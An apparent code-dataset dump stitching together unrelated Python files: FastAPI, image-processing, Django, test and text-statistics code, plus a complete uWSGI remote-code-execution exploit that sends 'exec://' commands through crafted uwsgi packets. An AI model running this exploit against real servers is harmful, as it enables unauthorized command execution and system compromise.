'(r.raw, f)\n', (1654, 1664), False, 'import shutil\n'), ((2035, 2046), 'time.time', 'time.time', ([], {}), '()\n', (2044, 2046), False, 'import time\n'), ((2504, 2549), 'pathlib.Path', 'pathlib.Path', (['(parent_directory / project_name)'], {}), '(parent_directory / project_name)\n', (2516, 2549), False, 'import pathlib\n'), ((2613, 2628), 'pathlib.Path', 'pathlib.Path', (['x'], {}), '(x)\n', (2625, 2628), False, 'import pathlib\n'), ((2350, 2384), 'shutil.copyfileobj', 'shutil.copyfileobj', (['reader', 'writer'], {}), '(reader, writer)\n', (2368, 2384), False, 'import shutil\n')] |
from typing import List
from fastapi import APIRouter
from fastapi.params import Depends
from fastapi import HTTPException, status
from sqlalchemy.orm.session import Session
from project import schema, models, database, hashing
# All routes below are served under the /user prefix and grouped under the
# "Users" tag in the generated OpenAPI docs.
router = APIRouter(
    prefix="/user",
    tags=['Users']
)
@router.post('/new')
def create_user(request:schema.User, db:Session = Depends(database.get_db)):
    """Create a new user, storing a hash of the submitted password."""
    # Hashing scheme is defined in project.hashing (not visible here).
    hashed_pass = hashing.get_password_hash(request.password)
    new_user = models.User(name = request.name,username = request.username, password = hashed_pass)
    db.add(new_user)
    db.commit()
    db.refresh(new_user)
    # NOTE(review): this echoes the request back to the client, including the
    # *plaintext* password it sent -- consider a response_model that omits
    # the password field.
    return request
@router.get('/find', response_model= List[schema.showUser])
def show_user_all(db:Session=Depends(database.get_db)):
    """Return every stored user, serialized through schema.showUser."""
    return db.query(models.User).all()
@router.get('/find/{id}',response_model= schema.showUser)
def show_user_id(id:int, db:Session = Depends(database.get_db)):
    """Fetch a single user by primary key; respond 404 when absent."""
    user = db.query(models.User).filter(models.User.id == id).first()
    if not user:
        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,detail=f"User {id} not found.")
    return user
# @router.put('/{id}')
# def update_project_id(id:int,request:schema.Project,db:Session = Depends(database.get_db)):
# #Search for projects' id
# selected_project = db.query(models.Project).filter(models.Project.id == id)
# if not selected_project.first():
# raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,detail=f"Project {id} not found.")
# selected_project.update(dict(request))
# return {'status':f'project {id} updated'}
# @router.delete('/{id}')
# def delete_project_id(id:int,db:Session = Depends(database.get_db)):
# selected_project = db.query(models.Project).filter(models.Project.id == id).first()
# if not selected_project:
# raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,detail=f"Project {id} not found.")
# db.delete(selected_project)
# db.commit()
# return {'status':f'delete project_id {id} successful'}
| [
"project.models.User",
"fastapi.HTTPException",
"fastapi.params.Depends",
"fastapi.APIRouter",
"project.hashing.get_password_hash"
] | [((238, 279), 'fastapi.APIRouter', 'APIRouter', ([], {'prefix': '"""/user"""', 'tags': "['Users']"}), "(prefix='/user', tags=['Users'])\n", (247, 279), False, 'from fastapi import APIRouter\n'), ((362, 386), 'fastapi.params.Depends', 'Depends', (['database.get_db'], {}), '(database.get_db)\n', (369, 386), False, 'from fastapi.params import Depends\n'), ((407, 450), 'project.hashing.get_password_hash', 'hashing.get_password_hash', (['request.password'], {}), '(request.password)\n', (432, 450), False, 'from project import schema, models, database, hashing\n'), ((466, 545), 'project.models.User', 'models.User', ([], {'name': 'request.name', 'username': 'request.username', 'password': 'hashed_pass'}), '(name=request.name, username=request.username, password=hashed_pass)\n', (477, 545), False, 'from project import schema, models, database, hashing\n'), ((722, 746), 'fastapi.params.Depends', 'Depends', (['database.get_db'], {}), '(database.get_db)\n', (729, 746), False, 'from fastapi.params import Depends\n'), ((911, 935), 'fastapi.params.Depends', 'Depends', (['database.get_db'], {}), '(database.get_db)\n', (918, 935), False, 'from fastapi.params import Depends\n'), ((1064, 1153), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': 'status.HTTP_404_NOT_FOUND', 'detail': 'f"""User {id} not found."""'}), "(status_code=status.HTTP_404_NOT_FOUND, detail=\n f'User {id} not found.')\n", (1077, 1153), False, 'from fastapi import HTTPException, status\n')] |
import os
import cv2
import torch
from torch.nn import functional as F
from torchvision import transforms
import torchvision.utils
def save_image(img, path):
    """Write *img* to *path* (clipped to [-1, 1], normalized to [0, 1]),
    creating any missing parent directories first."""
    os.makedirs(os.path.dirname(path), exist_ok=True)
    clipped = torch.clip(img, -1, 1)
    torchvision.utils.save_image(clipped, path, normalize=True)
def cv2pt(img):
    """Convert an OpenCV BGR uint8 image (HWC) into a CHW float tensor
    scaled to [-1, 1]."""
    rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
    scaled = rgb / 255. * 2 - 1
    return torch.from_numpy(scaled.transpose(2, 0, 1)).float()
def aspect_ratio_resize(img, max_dim=256):
    """Resize *img* (HWC) so its longer side equals *max_dim*, keeping the
    aspect ratio.  Images larger than *max_dim* are pre-blurred to reduce
    aliasing; smaller ones are resampled without blurring."""
    height, width, _channels = img.shape
    if max(height, width) / max_dim > 1:
        img = cv2.blur(img, ksize=(5, 5))
    if width > height:
        # cv2.resize expects (width, height).
        new_size = (max_dim, int(height/width*max_dim))
    else:
        new_size = (int(width/height*max_dim), max_dim)
    return cv2.resize(img, new_size, interpolation=cv2.INTER_AREA)
def downscale(img, pyr_factor):
    """Shrink *img* by multiplying both spatial dims by *pyr_factor*
    (must be strictly between 0 and 1)."""
    assert 0 < pyr_factor < 1
    target_h = int(pyr_factor * img.shape[-2])
    target_w = int(pyr_factor * img.shape[-1])
    return transforms.Resize((target_h, target_w), antialias=True)(img)
def blur(img, pyr_factor):
    """Low-pass *img* by downscaling by *pyr_factor* and upsampling back to
    the original size.  A factor of 1 or more is a no-op."""
    if pyr_factor >= 1:
        return img
    small = downscale(img, pyr_factor)
    return transforms.Resize(img.shape[-2:], antialias=True)(small)
def get_pyramid(img, min_height, pyr_factor):
    """Build a coarse-to-fine pyramid of *img*, ending with the full image.

    Levels come from repeated downscaling with *pyr_factor* until the height
    would drop below *min_height*; the coarsest level is then resized so its
    height is exactly *min_height*.  Every level gets a leading batch dim.
    """
    levels = [img]
    current = img
    while True:
        current = downscale(current, pyr_factor)
        if current.shape[-2] < min_height:
            break
        levels.insert(0, current)
    coarsest = levels[0]
    if coarsest.shape[-2] != min_height:
        scaled_w = int(min_height * coarsest.shape[-1] / float(coarsest.shape[-2]))
        levels[0] = transforms.Resize((min_height, scaled_w), antialias=True)(coarsest)
    return [level.unsqueeze(0) for level in levels]
def match_image_sizes(input, target):
    """resize and crop input image so that it has the same aspect ratio as target"""
    assert(len(input.shape) == len(target.shape) and len(target.shape) == 4)
    input_h, input_w = input.shape[-2:]
    target_h, target_w = target.shape[-2:]
    input_scale_factor = input_h / input_w
    target_scale_factor = target_h / target_w
    if target_scale_factor > input_scale_factor:
        # Target is relatively taller: match heights, then crop excess width.
        input = transforms.Resize((target_h, int(input_w/input_h*target_h)), antialias=True)(input)
        pixels_to_cut = input.shape[-1] - target_w
        # Bug fix: with pixels_to_cut == 1 the slice below is [0:-0], i.e.
        # an empty tensor.  Require > 1 (matching the branch below) and let
        # the final Resize absorb a single-pixel difference.
        if pixels_to_cut > 1:
            input = input[:, :, :, int(pixels_to_cut / 2):-int(pixels_to_cut / 2)]
    else:
        # Target is relatively wider: match widths, then crop excess height.
        input = transforms.Resize((int(input_h/input_w*target_w), target_w), antialias=True)(input)
        pixels_to_cut = input.shape[-2] - target_h
        if pixels_to_cut > 1:
            input = input[:, :, int(pixels_to_cut / 2):-int(pixels_to_cut / 2)]
    # Snap exactly to the target spatial size.
    input = transforms.Resize(target.shape[-2:], antialias=True)(input)
    return input
def extract_patches(src_img, patch_size, stride):
    """
    Split *src_img* (1, 3, H, W) into overlapping patches.

    Returns a tensor of shape (N_patches, 3 * patch_size**2); each row is one
    patch laid out channel-major, as produced by F.unfold.
    """
    channels = 3
    unfolded = F.unfold(src_img, kernel_size=patch_size, dilation=(1, 1),
                        stride=stride, padding=(0, 0))  # (1, 3*p*p, N_patches)
    per_patch = channels * patch_size ** 2
    return unfolded.squeeze(dim=0).permute((1, 0)).reshape(-1, per_patch)
def combine_patches(patches, patch_size, stride, img_shape):
    """
    Fold rows of shape (N_patches, 3*patch_size**2) back into an image of
    *img_shape*, averaging pixels that are covered by several patches.
    *img_shape* must produce the same patch count under the given
    patch_size/stride as the original extraction did.
    """
    stacked = patches.permute(1, 0).unsqueeze(0)
    summed = F.fold(stacked, output_size=img_shape[-2:], kernel_size=patch_size, stride=stride)
    # Count how many patches touch each pixel, then divide to get the mean.
    ones = torch.ones(img_shape, dtype=patches.dtype, device=patches.device)
    counts = F.unfold(ones, kernel_size=patch_size, dilation=(1, 1), stride=stride, padding=(0, 0))
    counts = F.fold(counts, output_size=img_shape[-2:], kernel_size=patch_size, stride=stride)
    counts[counts == 0] = 1.0
    return (summed / counts).squeeze(dim=0).unsqueeze(0)
"torch.clip",
"os.path.dirname",
"torch.nn.functional.fold",
"torch.nn.functional.unfold",
"cv2.cvtColor",
"torchvision.transforms.Resize",
"cv2.resize",
"cv2.blur",
"torch.ones"
] | [((321, 357), 'cv2.cvtColor', 'cv2.cvtColor', (['img', 'cv2.COLOR_BGR2RGB'], {}), '(img, cv2.COLOR_BGR2RGB)\n', (333, 357), False, 'import cv2\n'), ((753, 806), 'cv2.resize', 'cv2.resize', (['img', '(w, h)'], {'interpolation': 'cv2.INTER_AREA'}), '(img, (w, h), interpolation=cv2.INTER_AREA)\n', (763, 806), False, 'import cv2\n'), ((3054, 3147), 'torch.nn.functional.unfold', 'F.unfold', (['src_img'], {'kernel_size': 'patch_size', 'dilation': '(1, 1)', 'stride': 'stride', 'padding': '(0, 0)'}), '(src_img, kernel_size=patch_size, dilation=(1, 1), stride=stride,\n padding=(0, 0))\n', (3062, 3147), True, 'from torch.nn import functional as F\n'), ((3805, 3892), 'torch.nn.functional.fold', 'F.fold', (['patches'], {'output_size': 'img_shape[-2:]', 'kernel_size': 'patch_size', 'stride': 'stride'}), '(patches, output_size=img_shape[-2:], kernel_size=patch_size, stride=\n stride)\n', (3811, 3892), True, 'from torch.nn import functional as F\n'), ((3931, 3996), 'torch.ones', 'torch.ones', (['img_shape'], {'dtype': 'patches.dtype', 'device': 'patches.device'}), '(img_shape, dtype=patches.dtype, device=patches.device)\n', (3941, 3996), False, 'import torch\n'), ((4011, 4107), 'torch.nn.functional.unfold', 'F.unfold', (['input_ones'], {'kernel_size': 'patch_size', 'dilation': '(1, 1)', 'stride': 'stride', 'padding': '(0, 0)'}), '(input_ones, kernel_size=patch_size, dilation=(1, 1), stride=stride,\n padding=(0, 0))\n', (4019, 4107), True, 'from torch.nn import functional as F\n'), ((4118, 4205), 'torch.nn.functional.fold', 'F.fold', (['divisor'], {'output_size': 'img_shape[-2:]', 'kernel_size': 'patch_size', 'stride': 'stride'}), '(divisor, output_size=img_shape[-2:], kernel_size=patch_size, stride=\n stride)\n', (4124, 4205), True, 'from torch.nn import functional as F\n'), ((177, 198), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (192, 198), False, 'import os\n'), ((248, 270), 'torch.clip', 'torch.clip', (['img', '(-1)', '(1)'], {}), '(img, -1, 1)\n', 
(258, 270), False, 'import torch\n'), ((590, 617), 'cv2.blur', 'cv2.blur', (['img'], {'ksize': '(5, 5)'}), '(img, ksize=(5, 5))\n', (598, 617), False, 'import cv2\n'), ((970, 1019), 'torchvision.transforms.Resize', 'transforms.Resize', (['(new_h, new_w)'], {'antialias': '(True)'}), '((new_h, new_w), antialias=True)\n', (987, 1019), False, 'from torchvision import transforms\n'), ((2767, 2819), 'torchvision.transforms.Resize', 'transforms.Resize', (['target.shape[-2:]'], {'antialias': '(True)'}), '(target.shape[-2:], antialias=True)\n', (2784, 2819), False, 'from torchvision import transforms\n'), ((1214, 1263), 'torchvision.transforms.Resize', 'transforms.Resize', (['img.shape[-2:]'], {'antialias': '(True)'}), '(img.shape[-2:], antialias=True)\n', (1231, 1263), False, 'from torchvision import transforms\n'), ((1672, 1730), 'torchvision.transforms.Resize', 'transforms.Resize', (['(min_height, new_width)'], {'antialias': '(True)'}), '((min_height, new_width), antialias=True)\n', (1689, 1730), False, 'from torchvision import transforms\n')] |
import random
import shapely.geometry as sg
from locintel.quality.generators.random import RandomRoutePlanGenerator, polygons
random.seed(10)
class TestRandomRoutePlanGenerator(object):
def test_random_route_plan_generator(self):
polygon = polygons["berlin"]
generator = RandomRoutePlanGenerator()
route_plan = generator.generate_route(polygon)
assert polygon.contains(sg.Point(route_plan.start.lng, route_plan.start.lat))
assert polygon.contains(sg.Point(route_plan.end.lng, route_plan.end.lat))
assert generator.name == "random"
def test_random_route_plan_generator_accepts_identifier(self):
polygon = polygons["berlin"]
generator = RandomRoutePlanGenerator()
identifier = "id1"
route_plan = generator.generate_route(polygon, identifier=identifier)
assert polygon.contains(sg.Point(route_plan.start.lng, route_plan.start.lat))
assert polygon.contains(sg.Point(route_plan.end.lng, route_plan.end.lat))
assert route_plan.identifier == identifier
assert generator.name == "random"
| [
"locintel.quality.generators.random.RandomRoutePlanGenerator",
"random.seed",
"shapely.geometry.Point"
] | [((128, 143), 'random.seed', 'random.seed', (['(10)'], {}), '(10)\n', (139, 143), False, 'import random\n'), ((295, 321), 'locintel.quality.generators.random.RandomRoutePlanGenerator', 'RandomRoutePlanGenerator', ([], {}), '()\n', (319, 321), False, 'from locintel.quality.generators.random import RandomRoutePlanGenerator, polygons\n'), ((714, 740), 'locintel.quality.generators.random.RandomRoutePlanGenerator', 'RandomRoutePlanGenerator', ([], {}), '()\n', (738, 740), False, 'from locintel.quality.generators.random import RandomRoutePlanGenerator, polygons\n'), ((411, 463), 'shapely.geometry.Point', 'sg.Point', (['route_plan.start.lng', 'route_plan.start.lat'], {}), '(route_plan.start.lng, route_plan.start.lat)\n', (419, 463), True, 'import shapely.geometry as sg\n'), ((497, 545), 'shapely.geometry.Point', 'sg.Point', (['route_plan.end.lng', 'route_plan.end.lat'], {}), '(route_plan.end.lng, route_plan.end.lat)\n', (505, 545), True, 'import shapely.geometry as sg\n'), ((880, 932), 'shapely.geometry.Point', 'sg.Point', (['route_plan.start.lng', 'route_plan.start.lat'], {}), '(route_plan.start.lng, route_plan.start.lat)\n', (888, 932), True, 'import shapely.geometry as sg\n'), ((966, 1014), 'shapely.geometry.Point', 'sg.Point', (['route_plan.end.lng', 'route_plan.end.lat'], {}), '(route_plan.end.lng, route_plan.end.lat)\n', (974, 1014), True, 'import shapely.geometry as sg\n')] |
#!/usr/bin/python
# coding: utf-8
######################
# Uwsgi RCE Exploit
######################
# Author: <EMAIL>
# Created: 2017-7-18
# Last modified: 2018-1-30
# Note: Just for research purpose
import sys
import socket
import argparse
import requests
def sz(x):
s = hex(x if isinstance(x, int) else len(x))[2:].rjust(4, '0')
s = bytes.fromhex(s) if sys.version_info[0] == 3 else s.decode('hex')
return s[::-1]
def pack_uwsgi_vars(var):
pk = b''
for k, v in var.items() if hasattr(var, 'items') else var:
pk += sz(k) + k.encode('utf8') + sz(v) + v.encode('utf8')
result = b'\x00' + sz(pk) + b'\x00' + pk
return result
def parse_addr(addr, default_port=None):
port = default_port
if isinstance(addr, str):
if addr.isdigit():
addr, port = '', addr
elif ':' in addr:
addr, _, port = addr.partition(':')
elif isinstance(addr, (list, tuple, set)):
addr, port = addr
port = int(port) if port else port
return (addr or '127.0.0.1', port)
def get_host_from_url(url):
if '//' in url:
url = url.split('//', 1)[1]
host, _, url = url.partition('/')
return (host, '/' + url)
def fetch_data(uri, payload=None, body=None):
if 'http' not in uri:
uri = 'http://' + uri
s = requests.Session()
# s.headers['UWSGI_FILE'] = payload
if body:
import urlparse
body_d = dict(urlparse.parse_qsl(urlparse.urlsplit(body).path))
d = s.post(uri, data=body_d)
else:
d = s.get(uri)
return {
'code': d.status_code,
'text': d.text,
'header': d.headers
}
def ask_uwsgi(addr_and_port, mode, var, body=''):
if mode == 'tcp':
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(parse_addr(addr_and_port))
elif mode == 'unix':
s = socket.socket(socket.AF_UNIX)
s.connect(addr_and_port)
s.send(pack_uwsgi_vars(var) + body.encode('utf8'))
response = []
# Actually we dont need the response, it will block if we run any commands.
# So I comment all the receiving stuff.
# while 1:
# data = s.recv(4096)
# if not data:
# break
# response.append(data)
s.close()
return b''.join(response).decode('utf8')
def curl(mode, addr_and_port, payload, target_url):
host, uri = get_host_from_url(target_url)
path, _, qs = uri.partition('?')
if mode == 'http':
return fetch_data(addr_and_port+uri, payload)
elif mode == 'tcp':
host = host or parse_addr(addr_and_port)[0]
else:
host = addr_and_port
var = {
'SERVER_PROTOCOL': 'HTTP/1.1',
'REQUEST_METHOD': 'GET',
'PATH_INFO': path,
'REQUEST_URI': uri,
'QUERY_STRING': qs,
'SERVER_NAME': host,
'HTTP_HOST': host,
'UWSGI_FILE': payload,
'SCRIPT_NAME': target_url
}
return ask_uwsgi(addr_and_port, mode, var)
def main(*args):
desc = """
This is a uwsgi client & RCE exploit.
Last modifid at 2018-01-30 by <EMAIL>
"""
elog = "Example:uwsgi_exp.py -u 192.168.3.11:5000 -c \"echo 111>/tmp/abc\""
parser = argparse.ArgumentParser(description=desc, epilog=elog)
parser.add_argument('-m', '--mode', nargs='?', default='tcp',
help='Uwsgi mode: 1. http 2. tcp 3. unix. The default is tcp.',
dest='mode', choices=['http', 'tcp', 'unix'])
parser.add_argument('-u', '--uwsgi', nargs='?', required=True,
help='Uwsgi server: 192.168.3.11:5000 or /tmp/uwsgi.sock',
dest='uwsgi_addr')
parser.add_argument('-c', '--command', nargs='?', required=True,
help='Command: The exploit command you want to execute, must have this.',
dest='command')
if len(sys.argv) < 2:
parser.print_help()
return
args = parser.parse_args()
if args.mode.lower() == "http":
print("[-]Currently only tcp/unix method is supported in RCE exploit.")
return
payload = 'exec://' + args.command + "; echo test" # must have someting in output or the uWSGI crashs.
print("[*]Sending payload.")
print(curl(args.mode.lower(), args.uwsgi_addr, payload, '/testapp'))
if __name__ == '__main__':
main() | [
"urlparse.urlsplit",
"socket.socket",
"requests.Session",
"argparse.ArgumentParser"
] | [((1311, 1329), 'requests.Session', 'requests.Session', ([], {}), '()\n', (1327, 1329), False, 'import requests\n'), ((3204, 3258), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': 'desc', 'epilog': 'elog'}), '(description=desc, epilog=elog)\n', (3227, 3258), False, 'import argparse\n'), ((1738, 1787), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (1751, 1787), False, 'import socket\n'), ((1870, 1899), 'socket.socket', 'socket.socket', (['socket.AF_UNIX'], {}), '(socket.AF_UNIX)\n', (1883, 1899), False, 'import socket\n'), ((1448, 1471), 'urlparse.urlsplit', 'urlparse.urlsplit', (['body'], {}), '(body)\n', (1465, 1471), False, 'import urlparse\n')] |
"""
Views file for the Darklang Django App
"""
from django.contrib.auth.decorators import login_required
from django.http import Http404
from django.shortcuts import redirect
from django.template.loader import render_to_string
from django.utils.decorators import method_decorator
from django.utils.translation import LANGUAGE_SESSION_KEY
from django.utils.translation import ugettext as _
from web_fragments.fragment import Fragment
from openedx.core.djangoapps.dark_lang import DARK_LANGUAGE_KEY
from openedx.core.djangoapps.dark_lang.models import DarkLangConfig
from openedx.core.djangoapps.plugin_api.views import EdxFragmentView
from openedx.core.djangoapps.user_api.preferences.api import delete_user_preference, set_user_preference
from openedx.core.djangoapps.util.user_messages import PageLevelMessages
LANGUAGE_INPUT_FIELD = 'preview_language'
class PreviewLanguageFragmentView(EdxFragmentView):
"""
View used when a user is attempting to change the preview language using Darklang.
Expected Behavior:
GET - returns a form for setting/resetting the user's dark language
POST - updates or clears the setting to the given dark language
"""
def render_to_fragment(self, request, course_id=None, **kwargs): # lint-amnesty, pylint: disable=arguments-differ, unused-argument
"""
Renders the language preview view as a fragment.
"""
html = render_to_string('dark_lang/preview-language-fragment.html', {})
return Fragment(html)
def create_base_standalone_context(self, request, fragment, **kwargs):
"""
Creates the base context for rendering a fragment as a standalone page.
"""
return {
'uses_bootstrap': True,
}
def standalone_page_title(self, request, fragment, **kwargs):
"""
Returns the page title for the standalone update page.
"""
return _('Preview Language Administration')
@method_decorator(login_required)
def get(self, request, *args, **kwargs):
"""
Renders the fragment to control the preview language.
"""
if not self._user_can_preview_languages(request.user):
raise Http404
return super().get(request, *args, **kwargs)
@method_decorator(login_required)
def post(self, request, **kwargs): # lint-amnesty, pylint: disable=unused-argument
"""
Accept requests to update the preview language.
"""
if not self._user_can_preview_languages(request.user):
raise Http404
action = request.POST.get('action', None)
if action == 'set_preview_language':
self._set_preview_language(request)
elif action == 'reset_preview_language':
self._clear_preview_language(request)
return redirect(request.path)
def _user_can_preview_languages(self, user):
"""
Returns true if the specified user can preview languages.
"""
if not DarkLangConfig.current().enabled:
return False
return user and not user.is_anonymous
def _set_preview_language(self, request):
"""
Sets the preview language for the current user.
"""
preview_language = request.POST.get(LANGUAGE_INPUT_FIELD, '')
if not preview_language.strip():
PageLevelMessages.register_error_message(request, _('Language not provided'))
return
set_user_preference(request.user, DARK_LANGUAGE_KEY, preview_language)
PageLevelMessages.register_success_message(
request,
_('Language set to {preview_language}').format(
preview_language=preview_language
)
)
def _clear_preview_language(self, request):
"""
Clears the preview language for the current user.
"""
delete_user_preference(request.user, DARK_LANGUAGE_KEY)
if LANGUAGE_SESSION_KEY in request.session:
del request.session[LANGUAGE_SESSION_KEY]
PageLevelMessages.register_success_message(
request,
_('Language reset to the default')
)
| [
"web_fragments.fragment.Fragment",
"openedx.core.djangoapps.dark_lang.models.DarkLangConfig.current",
"openedx.core.djangoapps.user_api.preferences.api.set_user_preference",
"django.utils.decorators.method_decorator",
"openedx.core.djangoapps.user_api.preferences.api.delete_user_preference",
"django.short... | [((1962, 1994), 'django.utils.decorators.method_decorator', 'method_decorator', (['login_required'], {}), '(login_required)\n', (1978, 1994), False, 'from django.utils.decorators import method_decorator\n'), ((2274, 2306), 'django.utils.decorators.method_decorator', 'method_decorator', (['login_required'], {}), '(login_required)\n', (2290, 2306), False, 'from django.utils.decorators import method_decorator\n'), ((1412, 1476), 'django.template.loader.render_to_string', 'render_to_string', (['"""dark_lang/preview-language-fragment.html"""', '{}'], {}), "('dark_lang/preview-language-fragment.html', {})\n", (1428, 1476), False, 'from django.template.loader import render_to_string\n'), ((1492, 1506), 'web_fragments.fragment.Fragment', 'Fragment', (['html'], {}), '(html)\n', (1500, 1506), False, 'from web_fragments.fragment import Fragment\n'), ((1919, 1955), 'django.utils.translation.ugettext', '_', (['"""Preview Language Administration"""'], {}), "('Preview Language Administration')\n", (1920, 1955), True, 'from django.utils.translation import ugettext as _\n'), ((2821, 2843), 'django.shortcuts.redirect', 'redirect', (['request.path'], {}), '(request.path)\n', (2829, 2843), False, 'from django.shortcuts import redirect\n'), ((3460, 3530), 'openedx.core.djangoapps.user_api.preferences.api.set_user_preference', 'set_user_preference', (['request.user', 'DARK_LANGUAGE_KEY', 'preview_language'], {}), '(request.user, DARK_LANGUAGE_KEY, preview_language)\n', (3479, 3530), False, 'from openedx.core.djangoapps.user_api.preferences.api import delete_user_preference, set_user_preference\n'), ((3877, 3932), 'openedx.core.djangoapps.user_api.preferences.api.delete_user_preference', 'delete_user_preference', (['request.user', 'DARK_LANGUAGE_KEY'], {}), '(request.user, DARK_LANGUAGE_KEY)\n', (3899, 3932), False, 'from openedx.core.djangoapps.user_api.preferences.api import delete_user_preference, set_user_preference\n'), ((4124, 4158), 
'django.utils.translation.ugettext', '_', (['"""Language reset to the default"""'], {}), "('Language reset to the default')\n", (4125, 4158), True, 'from django.utils.translation import ugettext as _\n'), ((2999, 3023), 'openedx.core.djangoapps.dark_lang.models.DarkLangConfig.current', 'DarkLangConfig.current', ([], {}), '()\n', (3021, 3023), False, 'from openedx.core.djangoapps.dark_lang.models import DarkLangConfig\n'), ((3404, 3430), 'django.utils.translation.ugettext', '_', (['"""Language not provided"""'], {}), "('Language not provided')\n", (3405, 3430), True, 'from django.utils.translation import ugettext as _\n'), ((3616, 3655), 'django.utils.translation.ugettext', '_', (['"""Language set to {preview_language}"""'], {}), "('Language set to {preview_language}')\n", (3617, 3655), True, 'from django.utils.translation import ugettext as _\n')] |
# !/usr/bin/python
# -*- coding: utf-8 -*-
# @time : 2020/5/27 21:18
# @author : Mo
# @function: 统计
from text_analysis.utils.text_common import txt_read, txt_write, load_json, save_json, get_all_dirs_files
from text_analysis.conf.path_log import logger
from collections import Counter
from typing import List, Dict
import json
import os
import matplotlib.ticker as ticker
import matplotlib.pyplot as plt
from pylab import mpl
def counter_length_label(path_file, dir_save, show: str="bar"):
"""
统计文本长度-类别数
:param path_file: str
:param path_save: str
:return:
"""
files = get_all_dirs_files(path_file)
files = [file for file in files if file.endswith(".json")]
tc_data_dev = []
for f in files:
tc_data_dev += txt_read(f)
# 文本长度与类别数
lengths_question = []
label_total = []
for tdd in tc_data_dev:
tdd_json = json.loads(tdd)
question = tdd_json.get("text", "")
label = tdd_json.get("label")
lengths_question.append(len(question))
if type(label) == list:
label_total += label
else:
label_total.append(label)
# 统计
lengths_dict = dict(Counter(lengths_question))
label_dict = dict(Counter(label_total))
# 排序
lengths_dict_sort = sorted(lengths_dict.items(), key=lambda x: x[0], reverse=False)
label_dict_sort = sorted(label_dict.items(), key=lambda x: x[1], reverse=True)
logger.info("length of text is {}".format(lengths_dict_sort))
logger.info("freq of label is {}".format(label_dict_sort))
# 长度覆盖
lengths_question.sort()
len_ques = len(lengths_question)
len_99 = lengths_question[int(0.99 * len_ques)]
len_98 = lengths_question[int(0.98 * len_ques)]
len_95 = lengths_question[int(0.95 * len_ques)]
len_90 = lengths_question[int(0.90 * len_ques)]
logger.info("99% length of text is {}".format(len_99))
logger.info("98% length of text is {}".format(len_98))
logger.info("95% length of text is {}".format(len_95))
logger.info("90% length of text is {}".format(len_90))
length_dict = {"len_99": len_99,
"len_98": len_98,
"len_95": len_95,
"len_90": len_90
}
# 文本长度length/字典
save_json(length_dict, os.path.join(dir_save, "length.json"))
# 文本长度length/展示
draw_picture(lengths_dict_sort, os.path.join(dir_save, "length.png"), show="plot")
# 类别数label/展示
draw_picture(label_dict_sort, os.path.join(dir_save, "label.png"), show)
# 箱型图length/展示
draw_box([lengths_question], os.path.join(dir_save, "{}_boxplot.png".format("length")))
def show_chinese(xs: List, ys: List, file: str=None, show: str="bar"):
"""
画折线图,支持中文
:param xs: list
:param ys: list
:param dir: str
:return: draw picture
"""
mpl.rcParams["font.sans-serif"] = ["SimHei"]
xis = [i for i in range(len(xs))]
if len(ys) >= 32:
plt.xscale('symlog')
plt.yscale('symlog')
plt.subplots_adjust(bottom=0.2)
# plt.figure(dpi=64)
# elif len(ys) >= 128:
# plt.xscale('log')
# plt.yscale('log')
# plt.yticks(xis, ys, size='small', fontsize=13)
if show=="plot": # 绘制折线图
# fig, ax = plt.subplots(1, 1)
# ax.xaxis.set_major_locator(ticker.MultipleLocator(64))
# plt.figure(dpi=256)
# from matplotlib.font_manager import FontProperties
# font = FontProperties(fname="C:\Windows\Fonts\simkai.ttf", size=16)
# fontproperites = font
# fontdict={"fontname":"C:\Windows\Fonts\simkai.ttf"}
# plt.xlabel(xs, fontproperites = font)
plt.xticks(xis, ys, size='small', rotation=64, fontsize=13)
plt.plot(xis, xs, 'o-', label=u"线条") # 画图
elif show=="pie": # 绘制扇形图
# plt.figure(dpi=256)
plt.xticks(xis, xs, size='small', rotation=64, fontsize=13)
plt.pie(xs, labels=ys, autopct='%1.1f%%', shadow=False, startangle=150)
else: # 绘制并列柱状图
# 创建画布
# fig, ax = plt.subplots(1, 1)
# ax.xaxis.set_major_locator(ticker.MultipleLocator(max(int(len(xs)/16), 128)))
# plt.figure(dpi=128)
# plt.figure(dpi=256)
plt.xticks(xis, ys, size='small', rotation=64, fontsize=13)
plt.bar(xis, xs, 0.8)
# plt.figure(figsize=(min(512, len(xs)), min(256, int(len(xs)/2))), dpi=32)
# plt.figure(dpi=128)
# plt.yticks(xis, ys, size='small', fontsize=13)
# plt.barh(xis, xs, 0.8)
if file: # 保存图片, save要在plt之前才行
plt.savefig(file)
else: # 没有指定则默认一个
plt.savefig("fig.png")
# plt.show()
plt.close()
def draw_picture(xy_list_tuple, path, show: str="bar"):
"""
文本长度-类别(展示-保存)
:param xy_list_tuple: List[tuple]
:param path: str
:return:
"""
length_x = []
length_y = []
for k, v in xy_list_tuple:
length_x.append(k)
length_y.append(v)
show_chinese(length_y, length_x, path, show)
def draw_box(boxs: List, file: str=None):
"""
箱线图、箱型图 boxplot()
:param boxs: list
:param file: str
:return:
"""
mpl.rcParams["font.sans-serif"] = ["SimHei"] # 中文
plt.figure(figsize=(10, 5)) # 设置画布的尺寸
plt.title("boxplot-length", fontsize=20) # 标题,并设定字号大小
# notch:是否是凹口的形式展现箱线图;sym:异常点的形状;
plt.boxplot(boxs, notch=True, sym="*", vert=False, showmeans=True, patch_artist=True)
# boxprops={'color':'orangered', 'facecolor':'gray'}) # 颜色
if file: # 保存图片, save要在plt之前才行
plt.savefig(file)
else: # 没有指定则默认一个
plt.savefig("boxplot.png")
# plt.show() # 显示图像
plt.close()
if __name__ == '__main__':
path_in_dir = "../data/corpus/classify"
path_save_dir = "../data/corpus/classify/分析结果"
if path_save_dir is None:
path_save_dir = os.path.join(os.path.dirname(path_in_dir), "分析结果")
if path_save_dir:
if not os.path.exists(path_save_dir):
os.mkdir(path_save_dir)
counter_length_label(path_in_dir, path_save_dir, show="bar")
# show_x = [i for i in range(32)]
# show_y = [str("你是谁") for i in range(32)]
# show_chinese(show_x, show_y, file="xy1.png")
# show_chinese(show_x, show_y, file="xy2.png", show="pie")
# show_chinese(show_x, show_y, file="xy3.png", show="plot")
